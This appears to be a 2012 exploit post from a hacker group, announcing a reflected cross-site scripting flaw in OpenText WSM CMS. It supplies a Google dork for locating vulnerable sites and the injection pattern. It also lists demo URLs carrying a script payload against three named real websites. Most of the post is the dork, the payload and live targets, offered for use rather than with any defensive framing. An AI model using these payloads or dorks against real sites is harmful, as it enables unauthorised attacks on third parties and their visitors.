<!--
________ .__ __________________
\_ ___ \_______|__| _____ \_____ \______ \
/ \ \/\_ __ \ |/ \ _(__ <| _/
\ \____| | \/ | Y Y \/ \ | \
\______ /|__| |__|__|_| /______ /____|_ /
\/ \/ \/ \/
-->
# Exploit Title: OpenText WSM cms Cross Site Scripting Vulnerability
#
# Google Dork: Intext:" Powered by OpenText WSM"
#
# Date: 08/29/2012
#
# Author: Crim3R
#
# Site : Http://Ajaxtm.com/
#
# Vendor Home : http://www.opentext.com/uk
#
# Tested on: all
#
==================================
[+] the search form in site is not Vulnerable to xss but in main site its using Get method so xss is posilbe like below
[+] target/home.php/[">htmlcode]
D3m0:
http://www.sailing.org/isaf/home.php/"><script>alert(0);</script>
http://www.walesrallygb.com/home.php/"><script>alert(0);</script>
http://www.millenniumstadium.com/home.php/"><script>alert(0);</script>
===============Crim3R@Att.Net=========
[+] Greetz to All Ajaxtm Security Member
Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal
devilzc0der - Dominator - Hossein.R1369